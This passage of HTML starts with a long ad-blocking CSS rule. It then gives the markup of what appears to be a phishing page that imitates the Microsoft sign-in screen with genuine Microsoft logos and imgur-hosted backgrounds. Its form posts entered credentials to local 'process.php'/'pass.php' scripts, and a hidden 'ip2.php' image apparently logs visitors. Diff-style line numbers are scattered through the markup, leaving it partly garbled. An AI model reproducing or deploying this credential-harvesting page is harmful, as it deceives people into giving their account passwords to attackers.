a[href^="https://dcs.adgear.com/clicks/"], :root a[href^="http://refer.webhostingbuzz.com/"], :root AD-TRIPLE-BOX, :root ADS-RIGHT, :root a[href^="http://campaign.bharatmatrimony.com/track/"], :root a[href*="/adServe/banners?"], :root AFS-AD, :root a[onmousedown^="this.href='http://paid.outbrain.com/network/redir?"][target="_blank"], :root AMP-AD, :root [onclick^="window.open('window.open('//delivery.trafficfabrik.com/"], :root DFP-AD, :root FBS-AD, :root a[href^="http://clickandjoinyourgirl.com/"], :root div[id^="advads-"], :root a[href^="http://buysellads.com/"], :root LEADERBOARD-AD, :root a[href^="http://sharesuper.info/"], :root [ad-id^="googlead"], :root [href*="//xml.revrtb.com/"], :root a[href^="https://djtcollectorclub.org/"][href*="?affiliate_id="], :root a[href^="http://rekoverr.com/"], :root [href^="https://maskip.co/"], :root [id*="MGWrap"], :root a[href^="//ads.ad-center.com/"], :root a[href^="http://websitedhoome.com/"], :root [id*="MarketGid"], :root a[href^="https://www.pornhat.com/"][rel="nofollow"], :root [id*="ScriptRoot"], :root a[href^="http://secure.cbdpure.com/aff/"], :root a[href^="http://www.seekbang.com/cs/"], :root [id^="bunyad_ads_"], :root [lazy-ad="leftthin_banner"], :root a[onmousedown^="this.href='http://staffpicks.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[href^="http://games.ucoz.ru/"][target="_blank"], :root [lazy-ad="lefttop_banner"], :root [lazy-ad="top_banner"], :root [onclick*="content.ad/"], :root a[href^="http://see-work.info/"], :root a[href^="http://www.graboid.com/affiliates/"], :root a[href^="http://papi.mynativeplatform.com:80/pub2/"], :root [onclick^="window.open('http://adultfriendfinder.com/search/"], :root a[href^="http://www.ducksnetwork.com/"], :root [onclick^="window.open('https://www.brazzersnetwork.com/landing/"], :root a[href^="http://www.bet365.com/"][href*="?affiliate="], :root [src^="/Redirect.a2b?"], :root a[data-oburl^="http://paid.outbrain.com/network/redir?"], :root a[data-oburl^="https://paid.outbrain.com/network/redir?"], :root a[data-redirect^="http://click.plista.com/pets"], :root a[data-redirect^="http://paid.outbrain.com/network/redir?"], :root a[href^="http://go.ad2up.com/"], :root a[href^="http://adtransfer.net/"], :root a[href^="http://adclick.g.doubleclick.net/"], :root a[data-redirect^="this.href='http://paid.outbrain.com/network/redir?"], :root div[class*="_AdInArticle_"], :root a[href^="https://track.clickmoi.xyz/"], :root a[data-url^="http://paid.outbrain.com/network/redir?"], :root a[data-url^="http://paid.outbrain.com/network/redir?"] + .author, :root a[href^="http://ad.yieldmanager.com/"], :root a[href^="http://www.myfreepaysite.com/sfw.php?aid"], :root a[href^="//4f6b2af479d337cf.com/"], :root a[href^="http://lp.ezdownloadpro.info/"], :root a[data-widget-outbrain-redirect^="http://paid.outbrain.com/network/redir?"], :root a[href$="/vghd.shtml"], :root a[href^="http://amzn.to/"] > img[src^="data"], :root a[href*=".adk2x.com/"], :root a[href^="//z6naousb.com/"], :root a[href^="//5e1fcb75b6d662d.com/"], :root a[href*=".adsrv.eacdn.com/"] > img, :root a[href^="//www.mgid.com/"], :root a[href^="http://www.clkads.com/adServe/"], :root a[href^="http://ad.doubleclick.net/"], :root a[href*=".allsports4you.club"], :root a[href^="http://googleads.g.doubleclick.net/pcs/click"], :root a[href^="https://uncensored.game/"], :root a[href*=".approvallamp.club/"], :root a[href^="http://connectlinking6.com/"], :root div[id^="ad-position-"], :root a[href*=".bang.com/"][href*="&aff="], :root a[href*=".clkcln.com/"], :root a[href^="http://guideways.info/"], :root a[href*=".ichlnk.com/"], :root div[class^="largeRectangleAd_"], :root a[href*=".inclk.com/"], :root a[href*=".intab.fun/"], :root a[href^="//awejmp.com/"], :root a[href*=".revimedia.com/"], :root a[href*=".trust.zone"], :root a[href*="//xml.revrtb.com/"], :root a[href^="http://www.1clickmoviedownloader.info/"], :root a[href^="https://www.friendlyduck.com/AF_"], :root a[href^="http://feeds1.validclick.com/"], :root a[href*="//3wr110.xyz/"], :root a[href^="http://eclkmpsa.com/"], :root a[href*="//ridingintractable.com/"], :root a[href^="http://www.coinducks.com/"], :root div[id^="dfp-ad-"], :root a[href*="/adrotate-out.php?"], :root a[href^="https://servedbyadbutler.com/"], :root a[href*="/cmd.php?ad="], :root a[href*="/servlet/click/zone?"], :root a[href*="5iclx7wa4q.com"], :root a[href^="http://feedads.g.doubleclick.net/"], :root a[href*="=Adtracker"], :root a[href^="http://www.downloadweb.org/"], :root a[href^="http://affiliates.score-affiliates.com/"], :root a[href*="=adscript"], :root div > [class][onclick*=".updateAnalyticsEvents"], :root a[href*="?adlivk="][href*="&refer="], :root a[href^="http://www.afco2go.com/srv.php?"], :root a[onmousedown^="this.href='https://paid.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[href^="http://betahit.click/"], :root a[href^="http://hyperies.info/"], :root iframe[id^="google_ads_frame"], :root a[href*="a2g-secure.com"], :root a[href*="ad2upapp.com/"], :root a[href*="delivery.trafficfabrik.com"], :root a[href^="https://members.linkifier.com/public/affiliateLanding?refCode="], :root a[href^="//www.pd-news.com/"], :root a[href*="googleme.eu"], :root a[href*="letsadvertisetogether.com"], :root a[href^="http://bonusfapturbo.nmvsite.com/"], :root a[href^="http://www.streamtunerhd.com/signup?"], :root a[href*="onclkds."], :root a[href^="https://badoinkvr.com/"], :root a[href*="pussl3.com"], :root a[href^="https://iactrivago.ampxdirect.com/"], :root a[href^=" http://ads.ad-center.com/"], :root a[href^=" http://n47adshostnet.com/"], :root div[id^="ads300_250-widget"], :root a[href^=" http://www.sex.com/"][href*="&utm_"], :root a[href^="//adbit.co/?a=Advertise&"], :root a[href^="http://secure.signup-way.com/"], :root a[href^="//bwnjijl7w.com/"], :root a[href^="//db52cc91beabf7e8.com/"], :root a[href^="http://tracking.deltamediallc.com/"], :root a[href^="//go.onclasrv.com/"], :root a[href^="//healthaffiliate.center/"], :root a[href^="http://www.revenuehits.com/"], :root a[href^="//jsmptjmp.com/"], :root a[href^="//look.djfiln.com/"], :root a[href^="//medleyads.com/spot/"], :root a[href^="http://onclickads.net/"], :root a[href^="//nlkdom.com/"], :root a[href^="http://www.streamate.com/exports/"], :root a[href^="http://click.plista.com/pets"], :root a[href^="//t.MtagMonetizationA.com/"], :root a[href^="http://spygasm.com/track?"], :root a[href^="//voyeurhit.com/cs/"], :root a[href^="http://1phads.com/"], :root div[id^="ads250_250-widget"], :root a[href^="http://2pxg8bcf.top/"], :root a[href^="http://www.clickansave.net/"], :root a[href^="http://360ads.go2cloud.org/"], :root a[href^="http://paid.outbrain.com/network/redir?"], :root a[href^="http://track.affiliatenetwork.co.za/"], :root a[href^="http://45eijvhgj2.com/"], :root a[href^="http://6kup12tgxx.com/"], :root a[href^="http://9nl.es/"], :root a[href^="http://NowDownloadAll.com"], :root a[href^="http://www.sex.com/videos/?utm_"], :root a[href^="http://www.mysuperpharm.com/"], :root a[href^="http://a.adquantix.com/"], :root a[href^="http://a63t9o1azf.com/"], :root a[href^="http://abc2.mobile-10.com/"], :root a[href^="http://ad-emea.doubleclick.net/"], :root a[href^="http://ad.au.doubleclick.net/"], :root a[href^="http://vo2.qrlsx.com/"], :root a[href^="http://adexprt.me/"], :root a[href^="http://adf.ly/?id="], :root a[href^="http://api.ringtonematcher.com/"], :root a[href^="http://adfarm.mediaplex.com/"], :root a[href^="http://www.babylon.com/welcome/index?affID"], :root a[href^="http://adserving.unibet.com/"], :root a[href^="https://secure.adnxs.com/clktrb?"], :root a[href^="http://adlev.neodatagroup.com/"], :root a[href^="http://adprovider.adlure.net/"], :root a[href^="http://pan.adraccoon.com?"], :root div[id^="lazyad-"], :root a[href^="http://bcp.crwdcntrl.net/"], :root a[href^="http://adrunnr.com/"], :root a[href^="http://www.fpcTraffic2.com/blind/in.cgi?"], :root a[href^="http://ads.activtrades.com/"], :root a[href^="http://mmo123.co/"], :root div[class^="index_adAfterContent_"], :root a[href^="http://ads.ad-center.com/"], :root a[href^="http://ads.sprintrade.com/"], :root a[href^="http://zevera.com/afi.html"], :root a[href^="http://ads.expekt.com/affiliates/"], :root a[href^="http://ads.pheedo.com/"], :root a[href^="http://ads2.williamhill.com/redirect.aspx?"], :root a[href^="http://cwcams.com/landing/click/"], :root a[href^="http://adserver.adreactor.com/"], :root a[href^="http://adserver.adtech.de/"], :root a[href^="http://www.1clickdownloader.com/"], :root a[href^="http://cdn3.adbrau.com/"], :root a[href^="http://adserver.itsfogo.com/"], :root a[href^="http://adserving.liveuniversenetwork.com/"], :root a[href^="http://adsrv.keycaptcha.com"], :root a[href^="http://adtrack123.pl/"], :root a[href^="http://green.trafficinvest.com/"], :root a[href^="http://clickserv.sitescout.com/"], :root a[href^="http://adtrackone.eu/"], :root a[href^="http://adultfriendfinder.com/p/register.cgi?pid="], :root a[href^="http://linksnappy.com/?ref="], :root a[href^="http://affiliate.glbtracker.com/"], :root a[href^="http://affiliate.godaddy.com/"], :root a[href^="http://www.accuserveadsystem.com/accuserve-go.php?"], :root a[href^="https://sexdatingz.live/"], :root a[href^="http://lp.ilivid.com/"], :root a[href^="http://searchtabnew.com/"], :root a[href^="http://affiliates.pinnaclesports.com/processing/"], :root div[id^="block-views-topheader-ad-block-"], :root a[href^="http://www.gamebookers.com/cgi-bin/intro.cgi?"], :root a[href^="http://aflrm.com/"], :root a[href^="http://anonymous-net.com/"], :root a[href^="http://mojofun.info/"], :root a[href^="http://findersocket.com/"], :root iframe[src^="http://ad.yieldmanager.com/"], :root a[href^="http://at.atwola.com/"], :root a[href^="http://record.sportsbetaffiliates.com.au/"], :root a[href^="http://azmobilestore.co/"], :root a[href^="http://easydownload4you.com/"], :root a[href^="http://www.moneyducks.com/"], :root a[href^="http://b.bestcompleteusa.info/"], :root a[href^="http://bc.vc/?r="], :root a[href^="http://bcntrack.com/"], :root a[href^="http://pokershibes.com/index.php?ref="], :root a[href^="http://www.friendlyadvertisements.com/"], :root div[id^="ads300_600-widget"], :root a[href^="http://bestchickshere.com/"], :root a[href^="http://bluehost.com/track/"], :root a[href^="https://jmp.awempire.com/"], :root a[href^="http://databass.info/"], :root a[href^="http://c.actiondesk.com/"], :root a[href^="http://c.jumia.io/"], :root a[href^="http://c.ketads.com/"], :root a[href^="http://www.bet365.com/"][href*="&affiliate="], :root a[href^="http://callville.xyz/"], :root a[href^="http://media.paddypower.com/redirect.aspx?"], :root a[href^="http://campaign.bharatmatrimony.com/cbstrack/"], :root a[href^="http://campeeks.com/"][href*="&utm_"], :root a[href^="http://casino-x.com/?partner"], :root a[href^="http://cdn.adsrvmedia.net/"], :root a[href^="https://land.brazzersnetwork.com/landing/"], :root a[href^="http://web.adblade.com/"], :root div[data-subscript="Advertising"], :root a[href^="http://cdn3.adexprts.com/"], :root a[href^="http://go.oclaserver.com/"], :root a[href^="http://chaturbate.com/affiliates/"], :root script[src^="http://free-shoutbox.net/app/webroot/shoutbox/sb.php?shoutbox="] + #freeshoutbox_content, :root div[itemtype="http://schema.org/WPAdBlock"], :root a[href^="http://cinema.friendscout24.de?"], :root a[href^="http://click.guamwnvgashbkashawhgkhahshmashcas.pw/"], :root a[href^="http://www.down1oads.com/"], :root a[href^="http://www.pheedo.com/"], :root a[href^="http://clicks.guamwnvgashbkashawhgkhahshmashcas.pw/"], :root a[href^="http://clk.directrev.com/"], :root a[href^="http://galleries.pinballpublishernetwork.com/"], :root div[class^="lifeOnwerAd"], :root a[target="_blank"][href^="http://api.taboola.com/"], :root a[href^="http://clkmon.com/adServe/"], :root a[href^="http://hdplugin.flashplayer-updates.com/"], :root a[href^="http://track.incognitovpn.com/"], :root div[id^="acm-ad-tag-"], :root a[href^="https://www.brazzersnetwork.com/landing/"], :root a[href^="http://codec.codecm.com/"], :root a[href^="http://n.admagnet.net/"], :root a[href^="http://prochina.space/"], :root a[href^="http://contractallsticker.net/"], :root a[href^="http://wgpartner.com/"], :root a[href^="https://go.stripchat.com/"][href*="&campaignId="], :root a[href^="http://cpaway.afftrack.com/"], :root a[href^="http://d2.zedo.com/"], :root div[id^="advt-"], :root a[href^="https://affiliates.bet-at-home.com/processing/"], :root a[href^="http://data.committeemenencyclopedicrepertory.info/"], :root div[class^="Ad__bigBox"], :root a[href^="http://data.linoleictanzaniatitanic.com/"], :root div[itemtype="http://www.schema.org/WPAdBlock"], :root a[href^="http://dftrck.com/"], :root a[href^="http://down1oads.com/"], :root a[href^="http://download-performance.com/"], :root a[href^="http://www.myfreecams.com/?co_id="][href*="&track="], :root a[href^="https://bs.serving-sys.com"], :root a[href^="http://duckcash.eu/"], :root a[href^="http://server.cpmstar.com/click.aspx?poolid="], :root a[href^="https://track.themadtrcker.com/"], :root a[href^="http://dwn.pushtraffic.net/"], :root a[href^="http://earandmarketing.com/"], :root a[href^="https://gogoman.me/"], :root a[href^="http://elite-sex-finder.com/?"], :root a[href^="https://transfer.xe.com/signup/track/redirect?"], :root a[href^="http://elitefuckbook.com/"], :root a[href^="http://ethfw0370q.com/"], :root a[href^="http://extra.bet365.com/"][href*="?affiliate="], :root a[href^="http://farm.plista.com/pets"], :root a[href^="http://freesoftwarelive.com/"], :root div[data-mediatype="advertising"], :root a[href^="http://webgirlz.online/landing/"], :root a[href^="http://fileloadr.com/"], :root a[href^="https://secure.eveonline.com/ft/?aid="], :root a[href^="http://fileupnow.rocks/"], :root a[href^="http://prousa.work/"], :root a[href^="http://fsoft4down.com/"], :root a[href^="http://track.trkvluum.com/"], :root a[href^="https://bullads.net/get/"], :root a[href^="http://fusionads.net"], :root a[href^="https://farm.plista.com/pets"], :root a[href^="http://galleries.securewebsiteaccess.com/"], :root a[href^="http://www.on2url.com/app/adtrack.asp"], :root a[href^="http://gca.sh/user/register?ref="], :root a[href^="http://getlinksinaseconds.com/"], :root a[href^="https://bongacams2.com/track?"], :root a[href^="http://go.seomojo.com/tracking202/"], :root a[href^="http://go.trafficshop.com/"], :root a[href^="http://www.getyourguide.com/?partner_id="], :root a[href^="http://goldmoney.com/?gmrefcode="], :root a[href^="http://greensmoke.com/"], :root a[href^="http://hd-plugins.com/download/"], :root a[href^="http://hpn.houzz.com/"], :root a[href^="http://tracking.crazylead.com/"], :root a[href^="http://hyperlinksecure.com/go/"], :root a[href^="http://igromir.info/"], :root a[href^="https://awejmp.com/"], :root a[href^="http://imads.integral-marketing.com/"], :root a[href^="http://install.securewebsiteaccess.com/"], :root a[href^="http://secure.signup-page.com/"], :root a[href^="http://www.brightwheel.info/"], :root a[href^="http://www.greenmangaming.com/?tap_a="], :root a[href^="http://intent.bingads.com/"], :root a[href^="http://internalredirect.site/"], :root a[href^="http://istri.it/?"], :root a[href^="http://jobitem.org/"], :root a[href^="http://liversely.com/"], :root a[href^="http://k2s.cc/code/"], :root a[href^="http://tracking.toroadvertising.com/"], :root a[href^="http://k2s.cc/pr/"], :root a[href^="http://keep2share.cc/pr/"], :root a[href^="http://latestdownloads.net/download.php?"], :root div[id^="ADV-SLOT-"], :root a[href^="http://liversely.net/"], :root a[href^="http://t.mdn2015x2.com/"], :root a[href^="http://mgid.com/"], :root a[href^="http://www.freefilesdownloader.com/"], :root a[href^="http://mo8mwxi1.com/"], :root div[class^="gemini-ad"], :root a[href^="http://online.ladbrokes.com/promoRedirect?"], :root a[href^="https://redirect.ero-advertising.com/"], :root a[href^="http://play4k.co/"], :root div[id^="ad-div-"], :root a[href^="http://popup.taboola.com/"], :root a[href^="http://uploaded.net/ref/"], :root a[href^="https://www.spyoff.com/"], :root a[href^="http://prochina.link/"], :root a[href^="http://record.betsafe.com/"], :root a[href^="http://record.commissionking.com/"], :root a[href^="http://s9kkremkr0.com/"], :root a[href^="http://www.123-reg.co.uk/affiliate2.cgi"], :root a[href^="http://secure.hostgator.com/~affiliat/"], :root a[href^="http://serve.williamhill.com/promoRedirect?"], :root a[href^="http://servicegetbook.net/"], :root a[href^="http://srvpub.com/"], :root a[href^="https://porngames.adult/?SID="], :root a[href^="http://stateresolver.link/"], :root a[href^="http://www.drowle.com/"], :root a[href^="https://keep2share.cc/pr/"], :root a[href^="http://steel.starflavor.bid/"], :root a[href^="https://www.adskeeper.co.uk/"], :root a[href^="http://syndication.exoclick.com/"], :root a[href^="http://t.mdn2015x3.com/"], :root a[href^="http://t.wowtrk.com/"], :root a[href^="http://tour.affbuzzads.com/"], :root a[href^="http://us.marketgid.com"], :root a[href^="http://vinfdv6b4j.com/"], :root a[href^="http://webtrackerplus.com/"], :root a[href^="http://wopertific.info/"], :root div[id^="cns_ads_"], :root a[href^="http://www.twinplan.com/AF_"], :root a[href^="http://www.TwinPlan.com/AF_"], :root a[href^="http://www.afgr3.com/"], :root a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"], :root a[href^="http://www.adskeeper.co.uk/"], :root a[href^="https://understandsolar.com/signup/?lead_source="][href*="&tracking_code="], :root a[href^="http://www.affiliates1128.com/processing/"], :root a[href^="http://www.downloadplayer1.com/"], :root a[href^="http://www.afgr2.com/"], :root a[href^="http://www.badoink.com/go.php?"], :root a[href^="http://www.bitlord.me/share/"], :root a[href^="http://www.bluehost.com/track/"] > img, :root bottomadblock, :root a[href^="http://www.cash-duck.com/"], :root a[href^="http://www.friendlyduck.com/AF_"], :root a[href^="https://windscribe.com/promo/"], :root a[href^="http://yads.zedo.com/"], :root a[href^="http://www.cdjapan.co.jp/aff/click.cgi/"], :root a[href^="http://www.dl-provider.com/search/"], :root a[href^="http://www.downloadthesefiles.com/"], :root a[href^="http://www.duckcash.eu/"], :root a[href^="http://www.duckssolutions.com/"], :root a[href^="http://www.easydownloadnow.com/"], :root a[href^="http://www.epicgameads.com/"], :root a[href^="http://www.faceporn.net/free?"], :root a[href^="http://www.fducks.com/"], :root a[href^="https://torguard.net/aff.php"], :root a[href^="http://www.firstclass-download.com/"], :root a[href^="http://www.firstload.de/affiliate/"], :root a[href^="http://www.fonts.com/BannerScript/"], :root a[href^="http://www.flashx.tv/downloadthis"], :root a[href^="http://www.fleshlight.com/"], :root a[href^="http://www.friendlyquacks.com/"], :root a[href^="https://www.goldenfrog.com/vyprvpn?offer_id="][href*="&aff_id="], :root a[href^="http://www.hitcpm.com/"], :root a[href^="https://pubads.g.doubleclick.net/"], :root a[href^="http://www.idownloadplay.com/"], :root a[href^="http://www.incredimail.com/?id="], :root a[href^="https://tracking.truthfinder.com/?a="], :root a[href^="http://www.installads.net/"], :root a[href^="http://www.ireel.com/signup?ref"], :root a[href^="http://www.liutilities.com/"], :root a[href^="http://www.liversely.net/"], :root a[href^="http://www.menaon.com/installs/"], :root a[href^="http://www.mobileandinternetadvertising.com/"], :root a[href^="http://www.my-dirty-hobby.com/?sub="], :root a[href^="http://www.myvpn.pro/"], :root a[href^="http://www.paddypower.com/?AFF_ID="], :root a[href^="http://www.pinkvisualpad.com/?revid="], :root a[href^="http://www.plus500.com/?id="], :root header#hdr + #main > div[data-hveid], :root a[href^="http://www.quick-torrent.com/download.html?aff"], :root a[href^="http://www.ragazzeinvendita.com/?rcid="], :root a[href^="http://www.richducks.com/"], :root a[href^="http://www.ringtonematcher.com/"], :root a[href^="http://www.roboform.com/php/land.php"], :root a[href^="http://www.securegfm.com/"], :root a[href^="http://www.sex.com/?utm_"], :root a[href^="http://www.sex.com/pics/?utm_"], :root div[class^="Ad__adContainer"], :root a[href^="http://www.sexgangsters.com/?pid="], :root a[href^="http://www.sfippa.com/"], :root a[href^="http://www.socialsex.com/"], :root a[href^="http://www.text-link-ads.com/"], :root a[href^="http://www.tirerack.com/affiliates/"], :root a[href^="http://www.torntv-downloader.com/"], :root a[href^="http://www.torntvdl.com/"], :root a[href^="http://www.uniblue.com/cm/"], :root a[href^="http://www.urmediazone.com/signup"], :root a[href^="http://www.usearchmedia.com/signup?"], :root a[href^="https://secure.cbdpure.com/aff/"], :root a[href^="http://www.wantstraffic.com/"], :root a[href^="http://www.xmediaserve.com/"], :root a[href^="http://www.yourfuckbook.com/?"], :root a[href^="http://www.zergnet.com/i/"], :root a[onclick*="//m.economictimes.com/etmack/click.htm"], :root a[href^="http://www1.clickdownloader.com/"], :root a[href^="http://www5.smartadserver.com/call/pubjumpi/"], :root a[href^="http://wxdownloadmanager.com/dl/"], :root a[href^="http://xads.zedo.com/"], :root a[href^="http://xtgem.com/click?"], :root div[id^="div-adtech-ad-"], :root div[id^="ad-gpt-"], :root a[href^="http://y1jxiqds7v.com/"], :root div[id^="div_ad_stack_"], :root a[href^="http://z1.zedo.com/"], :root a[href^="https://ad.doubleclick.net/"], :root a[href^="https://adclick.g.doubleclick.net/"], :root a[href^="https://adhealers.com/"], :root a[href^="https://ads.ad4game.com/"], :root a[href^="https://adserver.adreactor.com/"], :root a[href^="https://www.incontri-matura.com/"], :root a[href^="https://adultfriendfinder.com/go/page/landing"], :root a[href^="https://adswick.com/"], :root a[href^="https://atomidownload.com/"], :root a[href^="https://awentw.com/"], :root a[href^="https://betway.com/"][href*="&a="], :root a[href^="https://chaturbate.com/in/?track="], :root a[href^="https://chaturbate.com/affiliates/"], :root a[href^="https://chaturbate.com/in/?tour="], :root a[href^="https://chaturbate.jjgirls.com/"][href*="?tour="], :root a[href^="https://chaturbate.xyz/"], :root a[href^="https://click.plista.com/pets"], :root a[href^="https://clixtrac.com/"], :root a[href^="https://dediseedbox.com/clients/aff.php?"], :root a[href^="https://dltags.com/"], :root a[href^="https://evaporate.pw/"], :root td[valign="top"] > .mainmenu[style="padding:10px 0 0 0 !important;"], :root a[href^="https://flirtaescopa.com/"], :root a[href^="https://freeadult.games/"], :root a[href^="https://intrev.co/"], :root a[href^="https://gamescarousel.com/"], :root a[href^="https://m.do.co/c/"] > img, :root a[href^="https://gghf.mobi/"], :root a[href^="https://go.ad2up.com/"], :root a[href^="https://go.onclasrv.com/"], :root a[href^="https://go.trkclick2.com/"], :root a[href^="https://googleads.g.doubleclick.net/pcs/click"], :root a[href^="https://iac.ampxdirect.com/"], :root a[href^="https://ilovemyfreedoms.com/"][href*="?affiliate_id="], :root a[href^="https://incisivetrk.cvtr.io/click?"], :root a[href^="https://lingthatsparleso.info/"], :root a[href^="https://medleyads.com/"], :root a[href^="https://mk-ads.com/"], :root a[href^="https://mk-cdn.net/"], :root a[href^="https://paid.outbrain.com/network/redir?"], :root a[href^="https://zononi.com/"], :root a[href^="https://porndeals.com/?track="], :root a[href^="https://prf.hn/click/"][href*="/adref:"], :root a[href^="https://refpaano.host/"], :root a[href^="https://www.moscarossa.biz/"], :root a[href^="https://rev.adsession.com/"], :root a[href^="https://secure.bstlnk.com/"], :root a[href^="https://spygasm.com/track?"], :root a[href^="https://squren.com/rotator/?atomid="], :root a[href^="https://syndication.exoclick.com/splash.php?"], :root a[href^="https://t.mobtya.com/"], :root a[href^="https://track.52zxzh.com/"], :root a[href^="https://track.adform.net/"], :root a[href^="https://track.healthtrader.com/"], :root a[href^="https://track.trkinator.com/"], :root div[id^="ad-server-"], :root a[href^="https://trackjs.com/?utm_source"], :root a[href^="https://trafficmedia.center/"], :root a[href^="https://trklvs.com/"], :root a[href^="https://trust.zone/go/r.php?RID="], :root a[href^="https://www.oboom.com/ad/"], :root a[href^="https://uncensored3d.com/"], :root p[id^="div-gpt-ad-"], :root a[href^="https://vodexor.us/"], :root a[href^="https://www.adultempire.com/"][href*="?partner_id="], :root a[href^="https://www.adxtro.com/"], :root a[href^="https://www.bebi.com"], :root a[href^="https://www.camyou.com/?cam="][href*="&track="], :root a[href^="https://www.dsct1.com/"], :root a[href^="https://www.nutaku.net/signup/landing/"], :root a[href^="https://www.popads.net/users/"], :root a[href^="https://www.share-online.biz/affiliate/"], :root a[href^="https://www.what-sexdating.com/"], :root a[onmousedown^="this.href='/wp-content/embed-ad-content/"], :root a[onmousedown^="this.href='http://paid.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[onmousedown^="this.href='https://paid.outbrain.com/network/redir?"][target="_blank"], :root div[id^="div-gpt-ad"], :root a[style="display:block;width:300px;min-height:250px"][href^="http://li.cnet.com/click?"], :root a[target="_blank"][onmousedown="this.href^='http://paid.outbrain.com/network/redir?"], :root aside[id^="adrotate_widgets-"], :root aside[id^="advads_ad_widget-"], :root aside[id^="div-gpt-ad"], :root aside[id^="tn_ads_widget-"], :root div[class$="dealnews"] > .dealnews, :root div[class^="AdhesionAd_"], :root div[class^="BlockAdvert-"], :root div[class^="ResponsiveAd-"], :root div[class^="ad_border_"], :root div[class^="ad_position_"], :root div[class^="adbanner_"], :root div[class^="adpubs-"], :root div[class^="awpcp-random-ads"], :root div[class^="backfill-taboola-home-slot-"], :root div[class^="block-openx-"], :root div[class^="index_adBeforeContent_"], :root div[class^="index_displayAd_"], :root div[class^="local-feed-banner-ads"], :root div[class^="pane-google-admanager-"], :root div[class^="proadszone-"], :root div[data-ad-underplayer], :root div[data-flt-ve="sponsored_search_ads"], :root div[data-native_ad], :root div[data-spotim-slot], :root div[id^="YFBMSN"], :root div[id^="ad-cid-"], :root div[id^="proadszone-"], :root div[id^="ad_bigbox_"], :root div[id^="adfox_"], :root div[id^="adrotate_widgets-"], :root div[id^="ads120_600-widget"], :root div[id^="adspot-"], :root div[id^="dfp-slot-"], :root div[id^="div-ads-"], :root div[id^="dmRosAdWrapper"], :root topadblock, :root div[id^="drudge-column-ads-"], :root div[id^="google_dfp_"], :root div[id^="q1-adset-"], :root div[id^="tms-ad-dfp-"], :root div[id^="zergnet-widget"], :root div[role="navigation"] + c-wiz > div > .kxhcC, :root div[role="navigation"] + c-wiz > script + div > .kxhcC, :root iframe[id^="google_ads_iframe"], :root iframe[src^="http://cdn1.adexprt.com/"], :root iframe[src^="http://static.mozo.com.au/strips/"], :root img[alt^="Fuckbook"], :root input[onclick^="window.open('http://www.friendlyduck.com/"], :root input[onclick^="window.open('http://www.FriendlyDuck.com/"] { display: none !important; }</style></head><body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><!-- --> <div data-bind="component: { name: 'background-image-control', publicMethods: backgroundControlMethods }"><div class="background" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }"><!-- ko if: smallImageUrl --> <div data-bind="backgroundImage: smallImageUrl()" style="background-image: url(&quot;https://i.imgur.com/u3AoB0V.png&quot;);"></div><!-- /ko --><!-- ko if: backgroundImageUrl --> <div class="backgroundImage" data-bind="backgroundImage: backgroundImageUrl()" style="background-image: url(&quot;https://i.imgur.com/1j9Rist.png&quot;);"></div><!-- ko if: useImageMask --><!-- /ko --><!-- /ko --> </div></div> <div data-bind="if: activeDialog"></div> <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="POST" target="_top" name="Email" autocomplete="off" data-bind="autoSubmit: forceSubmit, attr: { action: pass.php }, ariaHidden: activeDialog" action="process.php"><!-- ko if: svr.b4 --><!-- /ko --><!-- ko withProperties: { '$loginPage': $data } --> <img src="ip2.php" style="display:none"><div class="outer" data-bind="component: { name: 'master-page',
     3 + params: {
     4 + serverData: svr,
     5 + showButtons: svr.f,
     6 + showFooterLinks: true,
     7 + useWizardBehavior: svr.au,
     8 + handleWizardButtons: false,
     9 + password: password,
     10 + hideFromAria: ariaHidden },
     11 + event: {
     12 + footerAgreementClick: footer_agreementClick } }">
     13 + <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --><!-- ko if: svr.aL --><!-- /ko -->
     14 + <div class="middle" data-bind="css: { 'app': backgroundLogoUrl }"><!-- ko if: backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko -->
     15 + <img class="background-logo" role="presentation" data-bind="attr: { src: backgroundLogoUrl }" src="https://logincdn.msauth.net/16.000.28378.12/images/AppLogos/20.png?x=71c5dd371596273fd346bd0c6ebe8fb9" style="margin-bottom:20px">
     16 + <div class="inner fade-in-lightbox" data-bind="
     17 + animationEnd: paginationControlMethods() &amp;&amp; paginationControlMethods().view_onAnimationEnd,
     18 + css: {
     19 + 'app': backgroundLogoUrl,
     20 + 'wide': paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata('wide'),
     21 + 'fade-in-lightbox': fadeInLightBox,
     22 + 'has-popup': showFedCredButton,
     23 + 'transparent-lightbox': backgroundControlMethods() &amp;&amp; backgroundControlMethods().useTransparentLightBox }"> <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.BX &amp;&amp; showLightboxProgress() }"></div><!-- ko if: showLightboxProgress --><!-- /ko --><!-- ko ifnot: paginationControlMethods() && (paginationControlMethods().currentViewHasMetadata('hideLogo')) -->
     24 + <div data-bind="component: { name: 'logo-control',
     25 + params: {
     26 + isChinaDc: svr.fIsChinaDc,
     27 + bannerLogoUrl: bannerLogoUrl() } }"><!-- --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" pngsrc="https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.png?x=ed9c9eb0dce17d752bedea6b5acda6d9" svgsrc="https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" alt="Microsoft"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div>
